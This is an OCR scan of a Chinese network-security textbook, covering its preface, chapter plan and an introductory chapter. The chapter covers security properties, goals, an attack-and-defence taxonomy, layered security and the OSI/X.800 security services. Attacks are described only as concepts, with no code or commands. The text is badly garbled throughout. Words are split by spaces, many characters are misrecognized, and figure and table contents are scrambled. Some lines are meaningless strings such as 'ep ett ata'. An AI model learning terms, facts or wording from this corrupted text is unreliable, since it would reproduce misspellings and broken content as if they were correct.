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随 着 计算 机 网 络 的 发 展 ， 网 络 的 开放 性 、 共 享 性 以 及 互联 程度 随 之 扩大 ， 与 此 同时 ， 
网 络 入 侵 事件 日 益 增 多 ， 网 络 安全 性 问题 也 日 益 严重 。 许 多 大 学 已 设 了 信息 安全 专业 ， 或 
开设 了 网 络 安全 技术 课程 ， 以 培养 网 络 安全 方面 的 专业 人 才 。 网 络 安全 是 一 门 涉及 计算 机 
科学 、 网 络 技术 、 通 信 技 术 、 密 码 技术 、 信 息 安 全 技术 等 多 种 学 科 的 综合 性 科学 。 总 体 上 ， 
网 络 安全 可 以 分 为 网 络 攻击 技术 和 网 络 防御 技术 两 大 方面 。 

本 书 共 分 为 15 章 。 第 1 章 为 网 络 安全 概述 ， 介 绍 了 网 络 安全 的 基础 知识 ， 重 点 让 读 
者 了 解 研究 网 络 安全 的 重要 性 ; 第 2 章 为 网 络 安全 基础 ， 介 绍 了 TCP/IP 协议 、 各 种 网 络 
服务 和 命令 ; 第 3 章 为 网 络 安全 编程 基础 ， 以 多 个 安全 编程 实例 详细 介绍 了 网 络 安全 编程 
技术 ; 第 4 章 为 黑客 与 隐藏 瑟 技术 ,让 读者 了 解 黑 客 ， 并 详细 介绍 了 网 络 代理 跳板 隐藏 王 
技术 ; 第 5 章 为 网 络 扫描 与 网 络 监 听 ， 分 别 介绍 网 络 扫描 和 网 络 监听 技术 ; 第 6 章 为 网 络 
攻击 ， 详 细 介绍 了 黑客 攻击 的 各 种 原理 和 技术 ， 为 读者 学 习 防 御 技术 打下 基础 ; 第 7 章 为 
网 络 后 门 与 清除 日 志 ， 分 别 介绍 留 后 门 的 原理 和 清除 日 志 的 方法 ;第 8 章 为 计算 机 病毒 的 
防治 ， 重 点 让 读者 掌握 清除 病毒 的 方法 ， 第 9 章 为 操作 系统 安全 配置 方案 ， 介 绍 了 操作 系 
统 初级 、 中 级 和 高 级 的 配置 方案 ; 第 10 章 防火 墙 技术 ， 详 细 介绍 了 防火 墙 的 功能 及 配置 方 
法 ; 第 11 章 为 入 侵 检测 ， 详 细 介绍 了 入 侵 检测 技术 ;第 12 章 为 信息 加 密 与 认证 技术 ， 重 
点 让 读者 理解 加 密 技 术 和 认证 技术 ; 第 13 章 为 无 线 网 络 安全 , 详细 介绍 了 无 线 局 域 网 安全 
技术 ; 第 14 章 为 网 络 安全 管理 ， 重 点 介绍 网 络 安全 管理 知识 ;第 15 章 为 网 络 安全 方案 设 
计 ， 以 一 个 网 络 安全 方案 实例 阐述 网 络 安全 方案 设计 方法 。 

本 书 主要 有 以 下 特色 : 

(1) 基本 概念 清晰 ， 表 达 深 入 浅 出 。 在 基本 概念 的 阐述 上 ， 力 求 准确 而 精练 ;在 语言 
的 运用 上 ， 力 求 顺畅 而 自然 。 

(2) 内 容 翔实 ， 重 点 突出 。 本 书 分 为 黑客 攻击 技术 和 网 络 安全 防御 技术 两 大 体系 ， 在 
网 络 安全 知识 体系 和 知识 点 的 选择 上 ， 充 分 参考 了 教育 部 高 等 学 校 信息 安全 类 专业 教学 指 
导 委 员 会 制定 的 《信息 安全 类 专业 课程 设置 规范 》。 

(3) 理论 与 实践 相 结 合 。 网 络 安全 技术 是 一 门 实践 性 很 强 的 学 科 ， 因 此 ， 全 书 从 网 络 
安全 理论 和 网 络 安全 攻防 实践 两 方面 介绍 各 种 网 络 安 全 技术 ， 坚 持 做 到 理论 联系 实际 。 针 
对 每 个 网 络 安全 技术 都 设置 相应 的 实践 内 容 ， 从 而 使 读者 能 够 深入 而 全 面 地 了 解 网 络 安全 
技术 的 具体 应 用 ， 以 提高 读者 在 未 来 的 网 络 安全 实践 中 独立 分 析 问 题 和 解决 问题 的 能 

本 书 可 作为 计算 机 、 信 息 安全 等 专业 本 科 生 的 教材 ， 也 可 作为 广大 网 络 安全 工程 师 、 
网 络 管理 人 员 和 计算 机 用 户 的 参考 书 。 通过 本 书 的 学 习 , 读者 将 掌握 必要 的 网 络 安全 知识 ， 
并 且 能 够 利用 这 些 知识 和 相应 的 安全 防护 工具 所 提供 的 安全 措施 来 保护 系统 。 
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第 1 章 网 络 安全 概述 


本 章 学 习 目 标 : 

。 了 解 网 络 安全 的 攻防 体系 ; 

。 掌握 网 络 安全 的 层次 体系 ; 

。 了 解 研究 网 络 安全 的 必要 性 及 社会 意义 ; 
。 了 解 网 络 安全 相关 法 律 法 规 ; 

。 掌握 实验 环境 的 配置 。 


1.1 网 络 安全 的 攻防 体系 研究 


随 着 信息 化 进程 的 深入 和 互联 网 的 快速 发 展 ， 网 络 化 已 成 为 信息 化 发 展 的 大 趋势 ， 信 
息 资 源 也 得 到 了 最 大 程度 的 共享 。 但 是 , 紧 随 信息 化 发 展 而 来 的 网 络 安全 问题 也 日 渐 突出 ， 
网 络 安全 问题 已 成 为 信息 时 代 人 类 共同 面临 的 挑战 。 
1.1.1 网 络 安全 是 什么 


广义 上 讲 ， 网 络 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 、 通 信 技 术 、 密 码 技术 、 信 息 
安全 技术 、 应 用 数学 、 数 论 、 信 息 论 等 多 种 学 科 的 综合 性 科学 。 

ITU-TX.800 标准 对 “网 络 安 全 (network security)” 进 行 了 逻辑 上 的 定义 。 

(1) 安全 攻击 (security attack): 指 损害 机 构 所 拥有 信息 的 安全 的 任何 行为 。 

(2) 安全 机 制 (security mechanism): 指 设计 用 于 检测 、 预 防 安全 攻击 或 者 恢复 系统 的 
机 制 。 

(3) 安全 服务 (security service): 指 采 用 一 种 或 多 种 安全 机 制 以 抵御 安全 攻击 、 提 高 
机 构 的 数据 处 理 系统 安全 和 信息 传输 安全 能 力 的 服务 。 

在 网 络 安全 行业 中 ， 一 般 认 为 网 络 安全 指 的 是 一 种 能 够 识别 和 消除 不 安全 因素 的 
能 力 。 
1.1.2 网 络 安全 的 将 征 


根据 网 络 安全 的 定义 ， 如 图 1-1 所 示 ， 网 络 安全 应 具有 以 下 5 个 方面 的 特征 。 

1. 保密 性 

保密 性 指 信息 不 泄漏 给 非 授权 的 用 户 、 实 体 或 过 程 ， 或 供 非 授权 用 户 、 实 体 或 过 程 利 
用 的 特性 。 从 技术 上 说 ， 任 何 传输 线路 ， 包 括 电缆 〈 双 绞 线 或 同 轴 电 缆 )、 光 缆 、 微 波 和 卫 
星 ， 都 是 可 能 被 窍 听 的 。 提 供 保 密 性 的 安全 服务 取决 于 若干 因素 。 
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(1) 需 保护 数据 的 位 置 : 数据 可 能 存放 在 个 人 计算 机 或 服务 器 、 局 域 网 的 线路 上 ， 或 
其 他 流通 介质 如 软盘 、U 盘 、 光 盘 等 ， 也 可 能 流 经 一 个 完全 公开 的 媒体 ， 如 经 过 互联 网 或 
通信 卫星 。 

(2) 需 保护 数据 的 类 型 :数据 元 素 可 以 是 本 地 文件 和 网 络 协议 所 携带 的 数据 和 网 络 协 
议 的 信息 交换 ， 如 一 个 协议 数据 单元 。 

(3) 需 保 护 数 据 的 数量 或 部 分 :保护 整个 数据 元 素 、 部 分 数据 单元 和 协议 数据 单元 。 

(4) 需 保护 数据 的 价值 ， 被 保护 数据 的 敏感 性 ， 以 及 数据 对 用 户 的 价值 。 


网 络 安全 特征 
可 控 性 


图 1-1 网 络 安全 特征 


不 可 否认 性 


可 用 性 


2. 完整 性 

完整 性 指数 据 未 经 授权 不 能 进行 改变 的 特性 ， 即 信息 在 存储 或 传输 过 程 中 保持 不 被 修 
改 、 不 被 破坏 和 丢失 的 特性 。 完 整 性 被 破坏 是 计算 机 网 络 安全 的 主要 威胁 。 

破坏 信息 的 完整 性 既 有 人 为 因素 ， 也 有 非 人 为 因素 。 非 人 为 因素 是 指 通 信 传 输 中 的 干 
扰 噪声 、 系 统 硬件 或 软件 的 差错 等 。 人 为 因素 包括 有 意 和 无 意 两 种 ， 前 者 是 非法 分 子 对 计 
算 机 的 入 侵 ， 合 法 用 户 越权 对 数据 进行 处 理 ， 以 及 隐藏 破坏 性 程序 ， 如 计算 机 病毒 、 时 间 
炸弹 和 届 辑 陷阱 等 ， 后 者 是 指 操作 失误 或 使 用 不 当 。 

3. 可 用 性 

可 用 性 指 可 被 授权 实体 访问 并 按 需求 使 用 的 特性 ， 即 当 需 要 时 应 能 存 取 所 需 的 信息 。 
网 络 环境 下 拒绝 服务 、 破 坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 攻击 。 

网 络 可 用 性 还 包括 在 某 些 不 正常 条 件 下 继续 运行 的 能 力 。 对 网 络 可 用 性 的 破坏 ， 包 括 
合法 用 户 不 能 正常 访问 资源 和 严格 时 间 要 求 的 服务 不 能 得 到 及 时 响应 。 影 响 网 络 可 用 性 的 
因素 包括 人 为 与 非 人 为 两 种 。 前 者 是 指 非 法 占用 网 络 资源 ， 切 断 或 阻塞 网 络 通信 ， 降 低 网 
络 性 能 ， 甚 至 使 网 络 瘫痪 等 ， 后 者 是 指 灾害 事故 〈( 火 、 水 、 和 雷击 等 ) 和 系统 死 锁 、 系 统 故 
障 等 。 

保证 可 用 性 的 最 有 效 的 方法 是 提供 一 个 具有 适当 安全 服务 的 安全 网 络 环境 。 通 过 使 用 
访问 控制 阻止 未 授权 的 资源 访问 , 利用 完整 性 和 保密 性 服务 来 防止 可 用 性 攻击 。 访问 控制 、 
完整 性 和 保密 性 成 为 协助 支持 可 用 性 安全 服务 的 机 制 。 

(1) 避免 受到 攻击 : 一 些 基于 网 络 的 攻击 旨 在 破坏 、 降 低 或 摧毁 网 络 资源 。 解 决 办 法 
是 加 强 这 些 资 源 的 安全 保护 ， 使 其 不 受 攻击 。 免 受 攻击 的 方法 包括 修复 操作 系统 和 网 络 配 
置 中 的 安全 漏洞 ， 控 制 授权 实体 对 资源 的 访问 ， 防 止 路 由 表 等 敏感 网 络 数据 的 泄漏 等 。 

(2) 避免 未 授权 使 用 : 当 资 源 被 使 用 、 占 用 或 过 载 时 ， 其 可 用 性 就 会 受到 限制 。 如 果 
未 授权 用 户 占 用 了 有 限 的 资源 ， 如 处 理 能 力 、 网 络 带 宽 和 调制 解 调 器 连接 等 ， 则 这 些 资源 


对 授权 用 户 就 是 不 可 用 的 ， 通 过 访问 控制 可 以 限制 未 授权 使 用 。 

(3) 防止 进程 失败 : 操作 失误 和 设备 故障 也 可 导致 系统 可 用 性 降低 。 解 决 方法 是 使 用 
高 可 靠 性 设备 、 提 供 设备 元 余 和 提供 多 路 径 的 网 络 连 接 等 。 

4. 可 控 性 

可 控 性 指 对 信息 的 传播 及 内 容 具 有 控制 能 力 ， 可 以 控制 授权 范围 内 的 信息 流向 及 行为 
方式 。 

5. 不 可 否认 性 

“和 否认 ” 指 参与 通信 的 实体 拒绝 承认 它 参 加 了 通信 ， 不 可 否认 性 保证 信息 行为 人 不 能 
否认 其 信息 行为 .不 可 否认 性 安全 服务 提供 了 向 第 三 方 证 明 该 实体 确实 参与 了 通信 的 能 力 。 

数据 的 接收 者 提供 数据 发 送 者 身份 及 原始 发 送 时 间 的 证 据 。 数 据 的 发 送 者 提供 数据 已 
交付 接收 者 的 证 据 。 审 计 服 务 提供 信息 交换 中 各 涉及 方 的 可 审计 性 ， 这 种 可 审计 性 记录 了 
可 用 来 跟踪 某 些 人 的 相关 事件 ， 这 些 人 应 对 其 行为 负责 。 

不 可 否认 性 服务 主要 由 应 用 层 提 供 。 通 常用 户 最 关心 的 是 应 用 程序 数据 的 不 可 否认 
性 。 在 低层 提供 不 可 否认 性 功能 ， 仅 能 证 明 产生 过 的 连接 ， 而 无 法 将 流 经 该 连接 的 数据 同 
特定 的 实体 相 绑 定 。 

1.1.3 ”网络 安全 的 目标 


网 络 安全 的 目标 是 确保 网 络 系统 的 信息 安全 。 网 络 信息 安全 主要 包括 两 个 方面 : 信息 
存储 安全 和 信息 传输 安全 。 

信息 存储 安全 是 指 信息 在 静态 存放 状态 下 的 安全 ， 如 是 否 被 非 授权 调用 等 ， 一 般 通过 
设置 访问 权限 、 身 份 识别 、 局 部 隔离 等 措施 来 保证 。 

信息 传输 安全 是 指 信息 在 动态 传输 过 程 中 的 安全 。 为 确保 网 络 信息 的 传输 安全 ， 尤 其 
需要 防止 以 下 问题 。 

(1) 截获 ， 对 网 上 传输 的 信息 ， 攻 击 者 只 需 在 网 络 的 传输 链 路 上 通过 物理 或 逻辑 的 手 
段 ， 就 能 对 数据 进行 非法 的 截获 ， 进 而 得 到 用 户 或 服务 方 的 敏感 信息 。 

(2) 伪造 : 对 用 户 身份 仿冒 这 一 常见 的 网 络 攻击 方式 ,传统 的 对 策 一 般 采 用 身份 认证 ， 
但 是 ， 用 于 用 户 身份 认证 的 密码 在 登录 时 常常 是 以 明文 的 方式 在 网 络 上 进行 传输 的 ， 很 容 
易 被 攻击 者 在 网 络 上 截获 ， 进 而 可 以 对 用 户 的 身份 进行 仿冒 ， 使 身份 认证 机 制 被 攻破 。 

(3) 算 改 : 攻击 者 有 可 能 对 网 络 上 的 信息 进行 截获 并 且 算 改 其 内 容 ， 使 用 户 无 法 获得 
准确 、 有 用 的 信息 或 落 入 攻击 者 的 陷阱 。 

(4) 中 断 : 攻击 者 通过 各 种 方法 中 断 用 户 的 正常 通信 ， 达 到 自己 的 目的 。 

(5) 重 发 :“ 信 息 重 发 ”的 攻击 方式 即 攻击 者 截获 网 络 上 的 密 文 信息 后 ， 并 不 将 其 破 
译 ， 而 是 将 这 些 数据 包 再 次 向 有 关 服 务 器 发 送 ， 以 实现 恶意 的 目的 。 

1.1.4 保障 网 络 安 全 的 三 大 支柱 

网 络 安全 不 仅仅 是 一 个 纯 技 术 问题 ， 单 凭 技术 因素 确保 网 络 安 全 是 不 可 能 的 。 保 障 网 
络 安全 无 论 对 一 个 国家 而 言 还 是 对 一 个 组 织 而 言 都 是 一 个 复杂 的 系统 工程 ,需要 多 管 齐 下 ， 
综合 治理 。 目 前 普遍 认为 网 络 安全 技术 、 网 络 安全 法 律 法 规 和 网 络 安全 标准 是 保障 网 络 安 
全 的 三 大 支柱 。 
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1 网络 安 全 技术 

各 种 网 络 安全 技术 的 应 用 主要 在 技术 层面 上 为 网 络 安全 提供 具体 的 保障 。 目 前 主要 采 
用 的 网 络 安全 技术 有 : 网 络 安全 扫描 技术 、 数 据 加 密 技 术 、 防 火 墙 技术 、 入 侵 检 测 技术 、 
病毒 诊断 与 防治 技术 等 。 尽 管 网 络 安全 技术 的 应 用 在 一 定 程度 上 对 网 络 的 安全 起 到 了 很 好 
的 保护 作用 ， 但 它 并 不 是 万 能 的 ， 由 于 下 于 管理 等 原因 而 引起 的 网 络 安全 事故 仍然 不 断 
发 生 。 

2. 网 络 安全 法 律 法规 

国家 、 地 方 以 及 相关 部 门 针对 网 络 安全 的 需求 ， 制 定 与 网 络 安 全 相关 的 法 律 法 规 ， 从 
法 律 层面 上 来 规范 人 们 的 行为 ， 使 网 络 安 全 工作 有 法 可 依 ， 使 相关 违法 犯罪 能 得 到 处 罚 ， 
促使 组 织 和 个 人 依法 制作 、 发 布 、 传 播 和 使 用 网 络 ， 从 而 达到 保障 网 络 安 全 的 目的 。 目 前 ， 
我 国 已 建立 起 了 基本 的 网 络 安 全 法 律 法 规 体系 ， 但 随 着 网 络 安 全 形势 的 发 展 ， 网 络 安 全 立 
法 的 任务 还 非常 艰巨 ， 许 多 相关 法 规 还 有 待 建立 或 进一步 完善 。 

3， 网 络 安全 标准 

建立 统一 的 网 络 安全 标准 , 其 目的 是 为 网 络 安全 产品 的 制造 、 安全 的 信息 系统 的 构建 、 
企业 或 组 织 安全 策略 的 制定 、 安 全 管理 体系 的 构建 以 及 安全 工作 评估 等 提供 统一 的 科学 依 


加 ， 而 且 许多 标准 的 版 本 也 在 不 断 更 新 。 
1.1.5 ”网络 安全 的 攻防 体系 
网 络 安全 的 研究 内 容 主要 分 成 两 大 体系 : 攻击 和 防御 。 该 体系 研究 内 容 如 图 1-2 所 示 。 


网 络 安全 攻防 体系 
t 
攻击 技术 防御 技术 
息 藏 IP 操作 系统 安全 配置 
网 络 扫描 密码 学 
网 络 监听 防火 墙 技术 
网 络 入 侵 入 侵 检 测 技术 
网 络 后 门 
网 络 隐 身 
t | [ 
网 络 安全 基础 
操作 系统 : UNIX、Windows 等 
络 协议 : IP 、TCP、UDP、ARP 等 
络 命令 : net 、telnet 等 


图 1-2 网络 安全 攻防 体系 图 


作为 研究 网 络 安全 技术 的 基础 ， 首 先 要 掌握 一 些 网 络 基础 知识 ， 第 一 ， 两 大 主流 操作 
系统 ，UNIX 和 Windows 操作 系统 ， 第 二 ， 常 用 的 网 络 安 全 协议 ， 其 中 包括 人 、TCP、 
UDP、ARP 等 ; 第 三 ， 常 用 的 网 络 命令 ， 例 如 net、telnet 等 。 

俗语 称 “ 知 己 知 彼 ， 百 战 不 列 ”， 要 想 掌握 网 络 安全 防御 技术 ， 首 先 要 掌握 各 种 攻击 


技术 ， 主 要 的 攻击 技术 包括 隐藏 耻 、 网 络 扫描 、 网 络 监 听 、 网 络 入 侵 、 网 络 后 门 以 及 网 络 
隐身 。 

(1) 隐藏 地: 入 侵 者 在 入 侵 目 标 计算 机 之 前 首先 利用 各 种 技术 来 隐藏 自己 的 卫 。 

(2) 网 络 扫描 : 利用 软件 去 扫描 目标 计算 机 的 操作 系统 、 开 放 的 端口 和 漏洞 ， 为 入 侵 
该 计算 机 做 准备 。 

(3) 网 络 监听 : 入 侵 者 不 主动 去 攻击 目标 计算 机 ， 而 是 在 计算 机 中 利用 程序 去 监听 目 
标 计算 机 与 其 他 计算 机 之 间 的 通信 。 

(4) 网 络 入 侵 : 入 侵 者 利用 各 种 攻击 技术 入 侵 到 目标 计算 机 中 ， 获 取信 息 或 者 破坏 目 
标 计算 机 。 

(5) 网 络 后 门 : 入 侵 者 成 功 入 侵 到 目标 计算 机 后 ， 会 在 目标 计算 机 中 种 植 后 门 程序 ， 
对 目标 计算 机 进行 长 期 控制 。 

(6) 网 络 隐身 : 入侵 完 毕 后 ， 为 了 防止 被 管理 员 发 现 ， 入 侵 者 会 清除 入 侵 痕迹 。 

防御 技术 主要 包括 操作 系统 安全 配置 、 密 码 学 、 防 火 墙 技术 以 及 入 侵 检 测 技术 。 

(1) 操作 系统 安全 配置 操作 系统 的 安全 是 整个 网 络 安全 的 基础 ， 也 是 关键 部 分 ， 它 
分 别 包括 初级 、 中 级 和 高 级 安全 配置 方案 。 

(2) 密码 学 : 为 了 防止 被 监听 和 数据 被 窃取 ， 可 以 利用 各 种 适当 的 加 密 技 术 对 敏感 数 
据 进 行 加 密 。 

(3) 防火 墙 技术 : 利用 防火 墙 对 数据 包 进 行 限制 ， 防 止 被 入 侵 。 

(4) 入 侵 检测 技术 : 网 络 一 旦 被 入 侵 ， 利 用 入 侵 检测 技术 可 以 及 时 发 出 警报 。 


1.1.6 网络 安全 的 层次 体系 


从 网 络 安全 层次 体系 上 , 可 以 将 网 络 安全 细 分 成 5 个 层次 上 的 安全 , 包括 物理 层 安 全 、 
系统 层 安 全 、 应 用 层 安 全 、 网 络 层 安全 和 管理 层 安全 ， 如 


图 1-3 所 示 。 不 同安 全 层次 反映 了 不 同 的 安全 问题 。 办 地 层 安全 
1， 物 理 层 安全 盖 一 一 | 一 一 
物理 层 安全 是 计算 机 网 络 信息 系统 运行 的 基础 ， 它 的 > 
安全 直接 影响 着 整个 网 络 信息 的 安全 。 物 理 层 受到 的 安全 | 络 统 用 
威胁 主要 包括 自然 灾害 、 设 备 自然 损坏 和 环境 干扰 等 。 物 | 县 各 
理 层 安全 技术 主要 包括 环境 安全 技术 、 硬 件 访问 控制 技术 | 全 全 全 
及 防 电磁 泄露 技术 等 。 T T T 
(1) 环境 安全 技术 。 环 境 安全 指 网 络 设备 所 在 的 物理 移 吉 慑 安全 


环境 的 湿 、 温度 及 空气 舍 尘 浓度 符合 规定 ,同时 噪声 干扰 、 
电磁 干扰 、 振 动 及 静电 干扰 在 规定 范围 内 。 图 1-3 网 络 安全 层次 体系 图 

(2) 硬件 访问 控制 技术 。 ep ett ata 
制 系统 而 进入 计算 机 系统 ， 例 如 智能 卡 、 生 物 特征 认证 等 。 

(3) 防 电 磁 泄 露 技术 。 rednet 电磁 发 射 可 被 高 灵敏 的 接收 
设备 接收 并 进行 分 析 、 还 原 ， 造 成 计算 机 的 信息 泄露 。 目 前 主要 使 用 屏蔽 技术 来 防止 电磁 
泄露 ， 屏 蔽 不 但 能 防止 电磁 波 外 泄 ， 而 且 还 可 以 防止 外 部 的 电磁 波 对 系统 内 设备 的 干扰 ， 
且 在 一 定 条 件 下 还 可 以 起 到 防止 “电磁 计算 机 病毒 ”攻击 的 作用 。 
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2， 系统 层 安全 

系统 层 安全 主要 指 操作 系统 的 安全 。 操 作 系统 用 于 管理 计算 机 资源 ， 控 制 整个 系统 的 
运行 ， 它 直接 和 硬件 打交道 ， 并 为 用 户 提供 接口 ， 是 计算 机 软件 的 基础 。 操 作 系统 的 安全 
是 整个 计算 机 系统 安全 的 基础 。 系 统 层 面临 的 安全 威胁 主要 来 自 于 恶意 用 户 破坏 系统 资源 
和 系统 的 正常 运行 ， 危 害 计 算 机 系统 的 可 用 性 。 

操作 系统 的 安全 目标 主要 包括 : 

(1) 对 用 户 进行 身份 鉴别 ; 

(2) 对 用 户 操 作 进 行 存 取 控 制 ; 

(3) 监督 系统 运行 ; 

(4) 保证 系统 自身 的 安全 性 和 完整 性 。 

为 了 实现 操作 系统 的 安全 ， 需 要 建立 相应 的 安全 机 制 ， 包 括 访问 控制 、 存 储 器 保护 、 
用 户 认证 和 隔离 防护 等 。 

3. 应 用 层 安全 

应 用 层 安 全 主要 指 应 用 程序 的 安全 。 应 用 程序 安全 是 指 防止 应 用 程序 对 支持 其 运行 的 
计算 机 系统 的 安全 产生 破坏 。 应 用 层面 临 的 安全 威胁 主要 来 自 于 恶意 程序 和 应 用 程序 本 身 
的 漏洞 。 为 了 实现 应 用 层 的 安全 ， 首 先 用 户 不 要 安装 恶意 程序 ， 例 如 病毒 、 后 门 程序 、 木 
马 程序 等 ， 其 次 ， 编 写 应 用 程序 的 程序 员 要 注意 编程 安全 ， 养 成 良好 的 编程 习惯 ， 尽 量 避 
免 产 生 安全 漏洞 。 

如 果 确 实 想 要 区 分 一 个 具体 文件 的 不 同 的 安全 性 要 求 ， 那 就 必须 借助 于 应 用 层 的 安全 
性 。 提 供应 用 层 的 安全 服务 实际 上 是 最 灵活 的 处 理 单个 文件 安全 性 的 手段 。 例 如 一 个 电子 
邮件 系统 可 能 需要 对 要 发 出 的 信件 的 个 别 段落 实施 数据 签名 ， 较 低层 的 协议 提供 的 安全 功 
能 一 般 不 会 知道 任何 要 发 出 的 信件 的 段落 结构 , 从 而 不 可 能 知道 应 该 对 哪 一 部 分 进行 签名 。 
只 有 应 用 层 是 唯一 能 够 提供 这 种 安全 服务 的 层次 。 

4. 网 络 层 安全 

网 络 层 安全 主要 指 保 证 网 络 资源 不 被 非 授权 使 用 ， 同 时 保证 各 种 网 络 资源 的 完整 性 、 
可 信赖 性 以 及 服务 的 可 用 性 等 。 网 络 层面 临 的 安全 威胁 主要 来 自 于 各 种 网 络 攻击 ， 例 如 
DDoS 攻击 等 。 网 络 层 是 非常 适合 提供 基于 主机 对 主机 的 安全 服务 的 。 相 应 的 安全 协议 可 
以 用 来 在 因特网 上 建立 安全 的 下 通道 和 虚拟 私有 网 。 例 如 ， 利 用 它 对 人 P 包 的 加 密 和 解密 
功能 ， 可 以 简便 地 强化 防火 墙 系统 的 防卫 能 力 。 

网 络 层 安 全 性 的 主要 优点 是 它 的 透明 性 ， 即 安全 服务 的 提供 ， 不 需要 应 用 程序 、 其 他 
通信 层次 和 网 络 部 件 做 任何 改动 。 它 的 主要 缺点 是 网 络 层 一 般 对 属于 不 同 进程 和 相应 条 例 
的 包 不 加 以 区 别 。 对 所 有 发 往 同 一 地 址 的 包 ， 它 将 按照 同样 的 加 密 密 钥 和 访问 控制 策略 来 
处 理 。 这 可 能 导致 提供 不 了 所 需 的 功能 ， 也 会 导致 性 能 下 降 。 

S. 管理 层 安全 

管理 层 安 全 主要 包括 安全 技术 和 设备 的 管理 、 安 全 管理 制度 、 人 员 组 织 规划 等 。 管 理 
的 制度 化 极 大 程度 地 影响 着 整个 网 络 的 安全 ， 严 格 的 安全 管理 制度 、 明 确 的 部 门 安全 职责 
划分 、 合 理 的 人 员 角 色 配 置 都 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 漏洞 。 


1.1.7 OSI 安全 体系 结构 
OSI 安全 体系 结构 的 研究 始 于 1982 年 , 当时 OSI 基本 参考 模型 刚刚 确立 , 其 成 果 标 志 


是 ISO 发 布 了 ISO 7498 一 2 标准 ， 作 为 OSI 基本 参考 模型 的 新 补充 。1990 年 ，ITU 决定 采 
用 ISO 7498 一 2 作为 它 的 X.800 推荐 标准 , 我 国 的 国际 GB/T 9387.2 一 1995《 信 息 处 理 系统 
开放 系统 互 连 基本 参考 模型 第 2 部 分 : 安全 体系 结构 》 等 同 于 ISO/TEC 7498 一 2。 

OSI 安全 体系 结构 不 是 能 实现 的 标准 ， 而 是 关于 如 何 设计 标准 的 标准 。 因 此 ， 具 体 产 
品 不 应 称 自己 遵从 这 一 标准 。OSI 安全 体系 结构 定义 了 许多 术语 和 概念 ， 还 建立 了 一 些 重 
要 的 结构 性 准则 。 它 们 中 有 一 部 分 已 经 过 时 ， 仍 然 有 用 的 部 分 主要 是 术语 、 安 全 服务 和 安 
全 机 制 的 定义 。 

1. 术语 

OSI 安全 体系 结构 给 出 了 标准 中 的 部 分 术语 的 正式 定义 ， 其 所 定义 的 术语 只 限于 OSI 
体系 结构 ， 在 其 他 标准 中 对 某 些 术语 采用 了 更 广 的 定义 。 

2. 安全 服务 

OSI 安全 体系 结构 中 定义 了 5 大 类 安全 服务 ， 也 称 为 安全 防护 措施 。 

(1) 鉴别 服务 : 提供 对 通信 中 对 等 实体 和 数据 来 源 的 鉴别 。 对 等 实体 鉴别 提供 对 实体 
本 身 的 身份 进行 鉴别 ， 数 据 源 鉴别 提供 对 数据 项 是 否 来 自 于 某 个 特定 实体 进行 鉴别 。 

(2) 访问 控制 服务 ， 对 资源 提供 保护 ， 以 对 抗 非 授 权 使 用 和 操纵 。 

(3) 数据 机 密 性 服务 ， 保护 信息 不 被 泄漏 或 暴露 给 未 授权 的 实体 。 机 密 性 服务 又 分 为 
数据 机 密 性 服务 和 业务 流 机 密 性 服务 。 数 据 机 密 性 服务 包括 : 连接 机 密 性 服务 ， 对 某 个 连 
接 上 传输 的 所 有 数据 进行 加 密 ; 无 连接 机 密 性 服务 ， 对 构成 一 个 无 连接 数据 单元 的 所 有 数 
据 进行 加 密 ; 选择 字段 机 密 性 服务 ， 仅 对 某 个 数据 单元 中 所 指定 的 字段 进行 加 密 。 业 务 流 
机 密 性 服务 使 攻击 者 很 难 通过 网 络 的 业务 流 来 获得 敏感 信息 。 

(4) 数据 完整 性 服务 :对 数据 提供 保护 ， 以 对 抗 未 授权 的 改变 、 删 除 或 禁 代 。 完 整 性 
服务 有 三 种 类 型 : 连接 完整 性 服务 ， 对 连接 上 传输 的 所 有 数据 进行 完整 性 保护 ， 确 保 收 到 
的 数据 没有 被 插入 、 算 改 、 重 排序 或 延迟 ， 无 连接 完整 性 服务 ， 对 无 连接 数据 单元 的 数据 
进行 完整 性 保护 ， 选 择 字段 完整 性 服务 ， 对 数据 单元 中 所 指定 的 字段 进行 完整 性 保护 。 完 
整 性 服务 还 分 为 具有 恢复 功能 和 不 具有 恢复 功能 两 种 类 型 。 如 果 仅 能 检测 和 报告 信息 的 完 
整 性 是 否 被 破坏 ， 而 不 采取 进一步 措施 的 服务 为 不 具有 恢复 功能 的 完整 性 服务 ， 如 果 能 检 
测 到 信息 的 完整 性 是 否 被 破坏 ,并 能 将 信息 正确 恢复 的 服务 为 具有 恢复 功能 的 完整 性 服务 。 

(5) 抗 抵赖 性 服务 ， 防止 参与 通信 的 任何 一 方 事后 否认 本 次 通信 或 通信 内 容 。 抗 抵赖 
性 服务 分 为 两 种 不 同 的 形式 : 数据 源 发 证 明 的 抗 抵赖 ， 使 发 送 者 不 承认 曾经 发 送 过 这 些 数 
据 或 否认 其 内 容 的 企图 不 能 得 逮 ， 交 付 证 明 的 抗 抵赖 ， 使 接收 者 不 承认 曾 收 到 这 些 数据 或 
否认 其 内 容 的 企图 不 能 得 逮 。 

表 1-1 给 出 了 对 付 典 型 网 络 威胁 的 安全 服务 , 表 1-2 给 出 了 网 络 各 层 提供 的 安全 服务 。 


表 1-1 对 付 典型 网 络 威胁 的 安全 服务 


eh 


网 络 威胁 安全 服务 

假冒 攻击 鉴别 服务 

非 授权 侵犯 访问 控制 服务 

窃听 攻击 数据 机 密 性 服务 

完整 性 破坏 数据 完整 性 服务 

服务 否认 抗 抵赖 性 服务 

拒绝 服务 鉴别 服务 、 访 问 控制 服务 和 数据 完整 性 服务 等 
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同色 颁 会 胡 芝 


同 罗 颁 会 失 术 理 花 与 笑 收 


表 1-2 网 络 各 层 提供 的 安全 服务 


网 络 层次 
安全 服务 应 用 层 
“| 对 等 实体 鉴别 3 
鉴别 | 数据 源 发 鉴别 
访问 控制 
连接 机 密 性 
无 连接 机 密 性 本 
性 ”| 选择 字段 机 密 性 
业务 流 机 密 性 
可 恢复 的 连接 完整 性 本 
数据 | 不 可 恢复 的 连接 完整 性 J 
完整 | 选择 字段 的 连接 完整 性 
性 | 无 连接 完整 性 v 
选择 字段 的 无 连接 完整 性 J 
抗 抵 | 数据 源 发 证 明 的 抗 抵赖 性 J 
赖 性 | 交付 证 明 的 抗 抵赖 性 刘 


3， 安全 机 制 


OSI 安全 体系 结构 没有 详细 说 明 安 全 服务 应 该 如 何 来 实现 。 作 为 指南 ， 它 给 出 了 一 系 


